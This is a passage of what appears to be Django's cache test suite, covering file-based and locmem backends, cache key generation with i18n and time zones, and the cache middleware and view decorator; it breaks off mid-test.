        # Caches location cannot be modified through override_settings / modify_settings,
        # hence settings are manipulated directly here and the setting_changed signal
        # is triggered manually.
        for cache_params in settings.CACHES.values():
            cache_params.update({'LOCATION': self.dirname})
        setting_changed.send(self.__class__, setting='CACHES', enter=False)

    def tearDown(self):
        super().tearDown()
        # Call parent first, as cache.clear() may recreate cache base directory
        shutil.rmtree(self.dirname)

    def test_ignores_non_cache_files(self):
        fname = os.path.join(self.dirname, 'not-a-cache-file')
        with open(fname, 'w'):
            os.utime(fname, None)
        cache.clear()
        self.assertTrue(os.path.exists(fname),
                        'Expected cache.clear to ignore non cache files')
        os.remove(fname)

    def test_clear_does_not_remove_cache_dir(self):
        cache.clear()
        self.assertTrue(os.path.exists(self.dirname),
                        'Expected cache.clear to keep the cache dir')

    def test_creates_cache_dir_if_nonexistent(self):
        os.rmdir(self.dirname)
        cache.set('foo', 'bar')
        # Bug fix: the original called os.path.exists() without asserting its
        # result, so this test could never fail. Assert it explicitly.
        self.assertTrue(os.path.exists(self.dirname))

    def test_get_ignores_enoent(self):
        cache.set('foo', 'bar')
        os.unlink(cache._key_to_file('foo'))
        # Returns the default instead of erroring.
        self.assertEqual(cache.get('foo', 'baz'), 'baz')

    def test_get_does_not_ignore_non_filenotfound_exceptions(self):
        # Only FileNotFoundError is swallowed by get(); other I/O errors
        # must propagate.
        with mock.patch('builtins.open', side_effect=IOError):
            with self.assertRaises(IOError):
                cache.get('foo')

    def test_empty_cache_file_considered_expired(self):
        cache_file = cache._key_to_file('foo')
        with open(cache_file, 'wb') as fh:
            fh.write(b'')
        with open(cache_file, 'rb') as fh:
            self.assertIs(cache._is_expired(fh), True)
@override_settings(CACHES={
    'default': {
        'BACKEND': 'cache.liberal_backend.CacheClass',
    },
})
class CustomCacheKeyValidationTests(SimpleTestCase):
    """
    Tests for the ability to mixin a custom ``validate_key`` method to
    a custom cache backend that otherwise inherits from a builtin
    backend, and override the default key validation. Refs #6447.
    """
    def test_custom_key_validation(self):
        # A key that is both longer than 250 characters and contains spaces
        # would be rejected by the default validator; the liberal backend
        # must accept it and round-trip the value.
        liberal_key = 'some key with spaces' * 15
        stored_value = 'a value'
        cache.set(liberal_key, stored_value)
        self.assertEqual(cache.get(liberal_key), stored_value)
@override_settings(
    CACHES={
        'default': {
            'BACKEND': 'cache.closeable_cache.CacheClass',
        }
    }
)
class CacheClosingTests(SimpleTestCase):
    """The request_finished signal closes cache backends that support close()."""

    def test_close(self):
        self.assertFalse(cache.closed)
        # End-of-request signal triggers the backend's close().
        signals.request_finished.send(self.__class__)
        self.assertTrue(cache.closed)
# Minimal locmem configuration used by DefaultNonExpiringCacheKeyTests.
DEFAULT_MEMORY_CACHES_SETTINGS = {
    'default': {
        'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        'LOCATION': 'unique-snowflake',
    }
}
# Same configuration, but with TIMEOUT=None so keys never expire. Deep-copied
# so the TIMEOUT tweak doesn't leak into the default settings dict.
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
    """
    Settings having Cache arguments with a TIMEOUT=None create Caches that will
    set non-expiring keys.
    """

    def setUp(self):
        # The 5 minute (300 seconds) default expiration time for keys is
        # defined in the implementation of the initializer method of the
        # BaseCache type.
        self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout

    def tearDown(self):
        del self.DEFAULT_TIMEOUT

    def test_default_expiration_time_for_keys_is_5_minutes(self):
        """The default expiration time of a cache key is 5 minutes.

        This value is defined in
        django.core.cache.backends.base.BaseCache.__init__().
        """
        self.assertEqual(self.DEFAULT_TIMEOUT, 300)

    def test_caches_with_unset_timeout_has_correct_default_timeout(self):
        """Caches that have the TIMEOUT parameter undefined in the default
        settings will use the default 5 minute timeout.
        """
        self.assertEqual(caches[DEFAULT_CACHE_ALIAS].default_timeout, self.DEFAULT_TIMEOUT)

    @override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
    def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
        """Memory caches that have the TIMEOUT parameter set to `None` in the
        default settings with have `None` as the default timeout.

        This means "no timeout".
        """
        never_expiring = caches[DEFAULT_CACHE_ALIAS]
        self.assertIsNone(never_expiring.default_timeout)
        self.assertIsNone(never_expiring.get_backend_timeout())

    @override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
    def test_caches_with_unset_timeout_set_expiring_key(self):
        """Memory caches that have the TIMEOUT parameter unset will set cache
        keys having the default 5 minute timeout.
        """
        expiring_cache = caches[DEFAULT_CACHE_ALIAS]
        expiring_cache.set("my-key", "my-value")
        # An expiry timestamp was recorded for the key.
        self.assertIsNotNone(expiring_cache._expire_info[expiring_cache.make_key("my-key")])

    @override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
    def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
        """Memory caches that have the TIMEOUT parameter set to `None` will set
        a non expiring key by default.
        """
        eternal_cache = caches[DEFAULT_CACHE_ALIAS]
        eternal_cache.set("another-key", "another-value")
        # No expiry timestamp: the key never expires.
        self.assertIsNone(eternal_cache._expire_info[eternal_cache.make_key("another-key")])
@override_settings(
    CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
    CACHE_MIDDLEWARE_SECONDS=1,
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
    },
    USE_I18N=False,
    ALLOWED_HOSTS=['.example.com'],
)
class CacheUtils(SimpleTestCase):
    """TestCase for django.utils.cache functions."""

    def setUp(self):
        self.host = 'www.example.com'
        self.path = '/cache/test/'
        self.factory = RequestFactory(HTTP_HOST=self.host)

    def tearDown(self):
        cache.clear()

    def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
        # Build a request flagged for the cache-update middleware.
        request = self._get_request(self.host, self.path,
                                    method, query_string=query_string)
        # NOTE(review): any falsy `update_cache` collapses to True here, so the
        # flag can never be set to False — presumably intentional (caching on
        # by default); confirm before relying on it.
        request._cache_update_cache = True if not update_cache else update_cache
        return request

    def _set_cache(self, request, msg):
        # Push a response with body `msg` through the update middleware so it
        # is stored in the cache.
        response = HttpResponse()
        response.content = msg
        return UpdateCacheMiddleware().process_response(request, response)

    def test_patch_vary_headers(self):
        headers = (
            # Initial vary, new headers, resulting vary.
            (None, ('Accept-Encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
            ('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            (None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
            # NOTE(review): duplicate of the case two rows up — harmless.
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            # Whitespace around the delimiter is normalized.
            ('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
        )
        for initial_vary, newheaders, resulting_vary in headers:
            with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
                response = HttpResponse()
                if initial_vary is not None:
                    response['Vary'] = initial_vary
                patch_vary_headers(response, newheaders)
                self.assertEqual(response['Vary'], resulting_vary)

    def test_get_cache_key(self):
        request = self.factory.get(self.path)
        response = HttpResponse()
        # Expect None if no headers have been set yet.
        self.assertIsNone(get_cache_key(request))
        # Set headers to an empty list.
        learn_cache_key(request, response)

        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
        )
        # A specified key_prefix is taken into account.
        key_prefix = 'localprefix'
        learn_cache_key(request, response, key_prefix=key_prefix)
        self.assertEqual(
            get_cache_key(request, key_prefix=key_prefix),
            'views.decorators.cache.cache_page.localprefix.GET.'
            '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
        )

    def test_get_cache_key_with_query(self):
        request = self.factory.get(self.path, {'test': 1})
        response = HttpResponse()
        # Expect None if no headers have been set yet.
        self.assertIsNone(get_cache_key(request))
        # Set headers to an empty list.
        learn_cache_key(request, response)
        # The querystring is taken into account.
        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
        )

    def test_cache_key_varies_by_url(self):
        """
        get_cache_key keys differ by fully-qualified URL instead of path
        """
        request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
        learn_cache_key(request1, HttpResponse())
        request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
        learn_cache_key(request2, HttpResponse())
        self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))

    def test_learn_cache_key(self):
        request = self.factory.head(self.path)
        response = HttpResponse()
        response['Vary'] = 'Pony'
        # Make sure that the Vary header is added to the key hash
        learn_cache_key(request, response)

        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
        )

    def test_patch_cache_control(self):
        tests = (
            # Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
            (None, {'private': True}, {'private'}),
            ('', {'private': True}, {'private'}),
            # Test whether private/public attributes are mutually exclusive
            ('private', {'private': True}, {'private'}),
            ('private', {'public': True}, {'public'}),
            ('public', {'public': True}, {'public'}),
            ('public', {'private': True}, {'private'}),
            ('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
            ('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
            ('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
        )

        cc_delim_re = re.compile(r'\s*,\s*')

        for initial_cc, newheaders, expected_cc in tests:
            with self.subTest(initial_cc=initial_cc, newheaders=newheaders):
                response = HttpResponse()
                if initial_cc is not None:
                    response['Cache-Control'] = initial_cc
                patch_cache_control(response, **newheaders)
                # Compare as sets: directive order is not significant.
                parts = set(cc_delim_re.split(response['Cache-Control']))
                self.assertEqual(parts, expected_cc)
@override_settings(
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
            'KEY_PREFIX': 'cacheprefix',
        },
    },
)
class PrefixedCacheUtils(CacheUtils):
    """Repeat the CacheUtils tests with a KEY_PREFIX configured."""
@override_settings(
    CACHE_MIDDLEWARE_SECONDS=60,
    CACHE_MIDDLEWARE_KEY_PREFIX='test',
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
    },
)
class CacheHEADTest(SimpleTestCase):
    """HEAD requests interact correctly with the cache middleware."""

    def setUp(self):
        self.path = '/cache/test/'
        self.factory = RequestFactory()

    def tearDown(self):
        cache.clear()

    def _set_cache(self, request, msg):
        # Run a response with body `msg` through the update middleware so it
        # is stored in the cache.
        response = HttpResponse()
        response.content = msg
        return UpdateCacheMiddleware().process_response(request, response)

    def _fetch_cached(self, request):
        # Return whatever the fetch middleware finds in the cache for `request`.
        return FetchFromCacheMiddleware().process_request(request)

    def test_head_caches_correctly(self):
        test_content = 'test content'

        request = self.factory.head(self.path)
        request._cache_update_cache = True
        self._set_cache(request, test_content)

        # A second HEAD for the same URL is served from the cache.
        request = self.factory.head(self.path)
        request._cache_update_cache = True
        get_cache_data = self._fetch_cached(request)
        self.assertIsNotNone(get_cache_data)
        self.assertEqual(test_content.encode(), get_cache_data.content)

    def test_head_with_cached_get(self):
        test_content = 'test content'

        request = self.factory.get(self.path)
        request._cache_update_cache = True
        self._set_cache(request, test_content)

        # A HEAD for the same URL is satisfied by the cached GET response.
        request = self.factory.head(self.path)
        get_cache_data = self._fetch_cached(request)
        self.assertIsNotNone(get_cache_data)
        self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
    CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
    },
    LANGUAGES=[
        ('en', 'English'),
        ('es', 'Spanish'),
    ],
)
class CacheI18nTest(TestCase):
    """Cache keys must vary on the active language (USE_I18N), locale
    formatting (USE_L10N) and time zone (USE_TZ) when those are enabled,
    and must not include them when they are disabled.
    """

    def setUp(self):
        self.path = '/cache/test/'
        self.factory = RequestFactory()

    def tearDown(self):
        cache.clear()

    @override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
    def test_cache_key_i18n_translation(self):
        request = self.factory.get(self.path)
        lang = translation.get_language()
        response = HttpResponse()
        # learn_cache_key() records the headers to vary on and returns the key.
        key = learn_cache_key(request, response)
        self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
        key2 = get_cache_key(request)
        self.assertEqual(key, key2)

    def check_accept_language_vary(self, accept_language, vary, reference_key):
        """Assert that the given Accept-Language value plus Vary header
        produce exactly `reference_key` (i.e. the key is stable regardless
        of Accept-Language spelling or Vary header ordering)."""
        request = self.factory.get(self.path)
        request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
        request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
        response = HttpResponse()
        response['Vary'] = vary
        key = learn_cache_key(request, response)
        key2 = get_cache_key(request)
        self.assertEqual(key, reference_key)
        self.assertEqual(key2, reference_key)

    @override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
    def test_cache_key_i18n_translation_accept_language(self):
        lang = translation.get_language()
        self.assertEqual(lang, 'en')
        request = self.factory.get(self.path)
        request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
        response = HttpResponse()
        response['Vary'] = 'accept-encoding'
        key = learn_cache_key(request, response)
        self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
        # All of the following Accept-Language spellings resolve to the same
        # active language, so they must all map to the same cache key, no
        # matter how the Vary header components are ordered.
        self.check_accept_language_vary(
            'en-us',
            'cookie, accept-language, accept-encoding',
            key
        )
        self.check_accept_language_vary(
            'en-US',
            'cookie, accept-encoding, accept-language',
            key
        )
        self.check_accept_language_vary(
            'en-US,en;q=0.8',
            'accept-encoding, accept-language, cookie',
            key
        )
        self.check_accept_language_vary(
            'en-US,en;q=0.8,ko;q=0.6',
            'accept-language, cookie, accept-encoding',
            key
        )
        self.check_accept_language_vary(
            'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
            'accept-encoding, cookie, accept-language',
            key
        )
        self.check_accept_language_vary(
            'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
            'accept-language, accept-encoding, cookie',
            key
        )
        self.check_accept_language_vary(
            'ko;q=1.0,en;q=0.5',
            'cookie, accept-language, accept-encoding',
            key
        )
        self.check_accept_language_vary(
            'ko, en',
            'cookie, accept-encoding, accept-language',
            key
        )
        self.check_accept_language_vary(
            'ko-KR, en-US',
            'accept-encoding, accept-language, cookie',
            key
        )

    @override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
    def test_cache_key_i18n_formatting(self):
        # USE_L10N alone is enough to put the language into the key.
        request = self.factory.get(self.path)
        lang = translation.get_language()
        response = HttpResponse()
        key = learn_cache_key(request, response)
        self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
        key2 = get_cache_key(request)
        self.assertEqual(key, key2)

    @override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
    def test_cache_key_i18n_timezone(self):
        request = self.factory.get(self.path)
        # This is tightly coupled to the implementation,
        # but it's the most straightforward way to test the key.
        tz = timezone.get_current_timezone_name()
        tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
        response = HttpResponse()
        key = learn_cache_key(request, response)
        self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
        key2 = get_cache_key(request)
        self.assertEqual(key, key2)

    @override_settings(USE_I18N=False, USE_L10N=False)
    def test_cache_key_no_i18n(self):
        # Neither the language nor the time zone may leak into the key when
        # i18n is fully disabled.
        request = self.factory.get(self.path)
        lang = translation.get_language()
        tz = timezone.get_current_timezone_name()
        tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
        response = HttpResponse()
        key = learn_cache_key(request, response)
        self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
        self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")

    @override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
    def test_cache_key_with_non_ascii_tzname(self):
        # Timezone-dependent cache keys should use ASCII characters only
        # (#17476). The implementation here is a bit odd (timezone.utc is an
        # instance, not a class), but it simulates the correct conditions.
        class CustomTzName(timezone.utc):
            pass

        request = self.factory.get(self.path)
        response = HttpResponse()
        with timezone.override(CustomTzName):
            CustomTzName.zone = 'Hora estándar de Argentina'.encode('UTF-8')  # UTF-8 string
            sanitized_name = 'Hora_estndar_de_Argentina'
            self.assertIn(
                sanitized_name, learn_cache_key(request, response),
                "Cache keys should include the time zone name when time zones are active"
            )
            CustomTzName.name = 'Hora estándar de Argentina'  # unicode
            sanitized_name = 'Hora_estndar_de_Argentina'
            self.assertIn(
                sanitized_name, learn_cache_key(request, response),
                "Cache keys should include the time zone name when time zones are active"
            )

    @ignore_warnings(category=RemovedInDjango21Warning)  # USE_ETAGS=True
    @override_settings(
        CACHE_MIDDLEWARE_KEY_PREFIX="test",
        CACHE_MIDDLEWARE_SECONDS=60,
        USE_ETAGS=True,
        USE_I18N=True,
    )
    def test_middleware(self):
        """Full middleware round-trip: query strings, language switching
        and ETag generation all interact with the cache correctly."""
        def set_cache(request, lang, msg):
            translation.activate(lang)
            response = HttpResponse()
            response.content = msg
            return UpdateCacheMiddleware().process_response(request, response)

        # cache with non empty request.GET
        request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
        request._cache_update_cache = True
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        # first access, cache must return None
        self.assertIsNone(get_cache_data)
        response = HttpResponse()
        content = 'Check for cache with QUERY_STRING'
        response.content = content
        UpdateCacheMiddleware().process_response(request, response)
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        # cache must return content
        self.assertIsNotNone(get_cache_data)
        self.assertEqual(get_cache_data.content, content.encode())
        # different QUERY_STRING, cache must be empty
        request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
        request._cache_update_cache = True
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertIsNone(get_cache_data)
        # i18n tests
        en_message = "Hello world!"
        es_message = "Hola mundo!"
        request = self.factory.get(self.path)
        request._cache_update_cache = True
        set_cache(request, 'en', en_message)
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        # The cache can be recovered
        self.assertIsNotNone(get_cache_data)
        self.assertEqual(get_cache_data.content, en_message.encode())
        # ETags are used.
        self.assertTrue(get_cache_data.has_header('ETag'))
        # ETags can be disabled.
        with self.settings(USE_ETAGS=False):
            request._cache_update_cache = True
            set_cache(request, 'en', en_message)
            get_cache_data = FetchFromCacheMiddleware().process_request(request)
            self.assertFalse(get_cache_data.has_header('ETag'))
        # change the session language and set content
        request = self.factory.get(self.path)
        request._cache_update_cache = True
        set_cache(request, 'es', es_message)
        # change again the language
        translation.activate('en')
        # retrieve the content from cache
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertEqual(get_cache_data.content, en_message.encode())
        # change again the language
        translation.activate('es')
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertEqual(get_cache_data.content, es_message.encode())
        # reset the language
        translation.deactivate()

    @override_settings(
        CACHE_MIDDLEWARE_KEY_PREFIX="test",
        CACHE_MIDDLEWARE_SECONDS=60,
        USE_ETAGS=True,
    )
    def test_middleware_doesnt_cache_streaming_response(self):
        # Streaming responses have no complete body to store, so the
        # update-cache middleware must skip them.
        request = self.factory.get(self.path)
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertIsNone(get_cache_data)
        content = ['Check for cache with streaming content.']
        response = StreamingHttpResponse(content)
        UpdateCacheMiddleware().process_response(request, response)
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertIsNone(get_cache_data)
@override_settings(
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
            # Re-run all CacheI18nTest tests with a backend-level KEY_PREFIX.
            'KEY_PREFIX': 'cacheprefix'
        },
    },
)
class PrefixedCacheI18nTest(CacheI18nTest):
    pass
def hello_world_view(request, value):
    """Trivial view used as a caching target; echoes `value` in the body."""
    body = 'Hello World %s' % value
    return HttpResponse(body)
def csrf_view(request):
    """View whose body is the request's CSRF token (sets the CSRF cookie)."""
    token = csrf(request)['csrf_token']
    return HttpResponse(token)
@override_settings(
    CACHE_MIDDLEWARE_ALIAS='other',
    CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
    CACHE_MIDDLEWARE_SECONDS=30,
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
        'other': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
            'LOCATION': 'other',
            # Short timeout so expiry behavior can be exercised quickly.
            'TIMEOUT': '1',
        },
    },
)
class CacheMiddlewareTest(SimpleTestCase):
    """CacheMiddleware used both as middleware and as the cache_page view
    decorator: constructor defaults, cache hits/misses, per-cache/per-prefix
    isolation, and responses that must never be cached."""

    def setUp(self):
        super().setUp()
        self.factory = RequestFactory()
        self.default_cache = caches['default']
        self.other_cache = caches['other']

    def tearDown(self):
        self.default_cache.clear()
        self.other_cache.clear()
        super().tearDown()

    def test_constructor(self):
        """
        Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
        Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
        appropriately.
        """
        # If no arguments are passed in construction, it's being used as middleware.
        middleware = CacheMiddleware()
        # Now test object attributes against values defined in setUp above
        self.assertEqual(middleware.cache_timeout, 30)
        self.assertEqual(middleware.key_prefix, 'middlewareprefix')
        self.assertEqual(middleware.cache_alias, 'other')
        # If arguments are being passed in construction, it's being used as a decorator.
        # First, test with "defaults":
        as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
        self.assertEqual(as_view_decorator.cache_timeout, 30)  # Timeout value for 'default' cache, i.e. 30
        self.assertEqual(as_view_decorator.key_prefix, '')
        # Value of DEFAULT_CACHE_ALIAS from django.core.cache
        self.assertEqual(as_view_decorator.cache_alias, 'default')
        # Next, test with custom values:
        as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
        self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
        self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
        self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')

    def test_middleware(self):
        middleware = CacheMiddleware()
        prefix_middleware = CacheMiddleware(key_prefix='prefix1')
        timeout_middleware = CacheMiddleware(cache_timeout=1)
        request = self.factory.get('/view/')
        # Put the request through the request middleware
        result = middleware.process_request(request)
        self.assertIsNone(result)
        response = hello_world_view(request, '1')
        # Now put the response through the response middleware
        response = middleware.process_response(request, response)
        # Repeating the request should result in a cache hit
        result = middleware.process_request(request)
        self.assertIsNotNone(result)
        self.assertEqual(result.content, b'Hello World 1')
        # The same request through a different middleware won't hit
        result = prefix_middleware.process_request(request)
        self.assertIsNone(result)
        # The same request with a timeout _will_ hit
        result = timeout_middleware.process_request(request)
        self.assertIsNotNone(result)
        self.assertEqual(result.content, b'Hello World 1')

    def test_view_decorator(self):
        # decorate the same view with different cache decorators
        default_view = cache_page(3)(hello_world_view)
        default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
        explicit_default_view = cache_page(3, cache='default')(hello_world_view)
        explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
        other_view = cache_page(1, cache='other')(hello_world_view)
        other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
        request = self.factory.get('/view/')
        # Request the view once
        response = default_view(request, '1')
        self.assertEqual(response.content, b'Hello World 1')
        # Request again -- hit the cache
        response = default_view(request, '2')
        self.assertEqual(response.content, b'Hello World 1')
        # Requesting the same view with the explicit cache should yield the same result
        response = explicit_default_view(request, '3')
        self.assertEqual(response.content, b'Hello World 1')
        # Requesting with a prefix will hit a different cache key
        response = explicit_default_with_prefix_view(request, '4')
        self.assertEqual(response.content, b'Hello World 4')
        # Hitting the same view again gives a cache hit
        response = explicit_default_with_prefix_view(request, '5')
        self.assertEqual(response.content, b'Hello World 4')
        # And going back to the implicit cache will hit the same cache
        response = default_with_prefix_view(request, '6')
        self.assertEqual(response.content, b'Hello World 4')
        # Requesting from an alternate cache won't hit cache
        response = other_view(request, '7')
        self.assertEqual(response.content, b'Hello World 7')
        # But a repeated hit will hit cache
        response = other_view(request, '8')
        self.assertEqual(response.content, b'Hello World 7')
        # And prefixing the alternate cache yields yet another cache entry
        response = other_with_prefix_view(request, '9')
        self.assertEqual(response.content, b'Hello World 9')
        # But if we wait a couple of seconds...
        time.sleep(2)
        # ... the default cache will still hit
        # (BUG FIXED: a stray no-op expression statement `caches['default']`
        # used to sit here; it had no effect and was removed.)
        response = default_view(request, '11')
        self.assertEqual(response.content, b'Hello World 1')
        # ... the default cache with a prefix will still hit
        response = default_with_prefix_view(request, '12')
        self.assertEqual(response.content, b'Hello World 4')
        # ... the explicit default cache will still hit
        response = explicit_default_view(request, '13')
        self.assertEqual(response.content, b'Hello World 1')
        # ... the explicit default cache with a prefix will still hit
        response = explicit_default_with_prefix_view(request, '14')
        self.assertEqual(response.content, b'Hello World 4')
        # .. but a rapidly expiring cache won't hit
        response = other_view(request, '15')
        self.assertEqual(response.content, b'Hello World 15')
        # .. even if it has a prefix
        response = other_with_prefix_view(request, '16')
        self.assertEqual(response.content, b'Hello World 16')

    def test_sensitive_cookie_not_cached(self):
        """
        Django must prevent caching of responses that set a user-specific (and
        maybe security sensitive) cookie in response to a cookie-less request.
        """
        csrf_middleware = CsrfViewMiddleware()
        cache_middleware = CacheMiddleware()
        request = self.factory.get('/view/')
        self.assertIsNone(cache_middleware.process_request(request))
        csrf_middleware.process_view(request, csrf_view, (), {})
        response = csrf_view(request)
        response = csrf_middleware.process_response(request, response)
        response = cache_middleware.process_response(request, response)
        # Inserting a CSRF cookie in a cookie-less request prevented caching.
        self.assertIsNone(cache_middleware.process_request(request))

    def test_304_response_has_http_caching_headers_but_not_cached(self):
        original_view = mock.Mock(return_value=HttpResponseNotModified())
        view = cache_page(2)(original_view)
        request = self.factory.get('/view/')
        # The view shouldn't be cached on the second call.
        view(request).close()
        response = view(request)
        response.close()
        self.assertEqual(original_view.call_count, 2)
        self.assertIsInstance(response, HttpResponseNotModified)
        self.assertIn('Cache-Control', response)
        self.assertIn('Expires', response)
@override_settings(
    CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
    CACHE_MIDDLEWARE_SECONDS=1,
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
    },
    USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
    """
    Tests various headers w/ TemplateResponse.
    Most are probably redundant since they manipulate the same object
    anyway but the ETag header is 'special' because it relies on the
    content being complete (which is not necessarily always the case
    with a TemplateResponse)
    """

    def setUp(self):
        self.path = '/cache/test/'
        self.factory = RequestFactory()

    def tearDown(self):
        cache.clear()

    def test_patch_vary_headers(self):
        # patch_vary_headers() must merge case-insensitively and preserve
        # the existing header's casing.
        headers = (
            # Initial vary, new headers, resulting vary.
            (None, ('Accept-Encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
            ('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            (None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            ('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
        )
        for initial_vary, newheaders, resulting_vary in headers:
            with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
                template = engines['django'].from_string("This is a test")
                response = TemplateResponse(HttpRequest(), template)
                if initial_vary is not None:
                    response['Vary'] = initial_vary
                patch_vary_headers(response, newheaders)
                self.assertEqual(response['Vary'], resulting_vary)

    def test_get_cache_key(self):
        request = self.factory.get(self.path)
        template = engines['django'].from_string("This is a test")
        response = TemplateResponse(HttpRequest(), template)
        key_prefix = 'localprefix'
        # Expect None if no headers have been set yet.
        self.assertIsNone(get_cache_key(request))
        # Set headers to an empty list.
        learn_cache_key(request, response)
        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            '58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
        )
        # A specified key_prefix is taken into account.
